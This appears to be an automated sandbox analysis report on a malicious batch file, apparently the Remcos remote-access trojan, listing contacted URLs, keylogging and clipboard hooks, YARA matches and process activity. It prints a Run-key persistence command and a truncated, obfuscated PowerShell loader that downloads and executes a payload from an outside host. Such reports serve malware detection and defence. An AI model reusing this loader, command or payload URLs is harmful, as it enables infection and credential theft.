Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro/3/tVWTkim99.binT
Source: powershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro/Nonaddicting.qxdP
Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro/Nonaddicting.qxdXRyl
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1453412594.0000013F80BB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msiexec.exe, 0000000F.00000002.1968428859.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_iAA
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041183A OpenClipboard,GetLastError, 15_2_0041183A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 15_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 16_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 17_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 17_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

barindex
Source: amsi32_7580.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\msiexec.exe Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 15_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00401806 NtdllDefWindowProc_W, 15_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004018C0 NtdllDefWindowProc_W, 15_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004016FD NtdllDefWindowProc_A, 16_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004017B7 NtdllDefWindowProc_A, 16_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00402CAC NtdllDefWindowProc_A, 17_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00402D66 NtdllDefWindowProc_A, 17_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AFB0F6 3_2_00007FF887AFB0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AFBEA2 3_2_00007FF887AFBEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AF212D 3_2_00007FF887AF212D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B040 15_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043610D 15_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00447310 15_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A490 15_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040755A 15_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043C560 15_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B610 15_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044D6C0 15_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004476F0 15_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B870 15_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044081D 15_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00414957 15_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004079EE 15_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00407AEB 15_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044AA80 15_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00412AA9 15_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404B74 15_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404B03 15_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044BBD8 15_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404BE5 15_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404C76 15_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00415CFE 15_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00416D72 15_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446D30 15_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446D8B 15_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406E8F 15_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00405038 16_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0041208C 16_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004050A9 16_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0040511A 16_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043C13A 16_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004051AB 16_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00449300 16_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0040D322 16_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A4F0 16_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043A5AB 16_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00413631 16_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00446690 16_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A730 16_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004398D8 16_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004498E0 16_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A886 16_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043DA09 16_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00438D5E 16_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00449ED0 16_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0041FE83 16_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00430F54 16_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004050C2 17_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004014AB 17_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00405133 17_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004051A4 17_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00401246 17_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_0040CA46 17_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00405235 17_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004032C8 17_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00401689 17_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00402F60 17_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5969
Source: unknown Process created: Commandline size = 5993
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5969 Jump to behavior
Source: amsi32_7580.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@22/14@10/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 15_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 17_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 15_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 15_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 15_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000F.00000002.1968628137.00000000043AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ 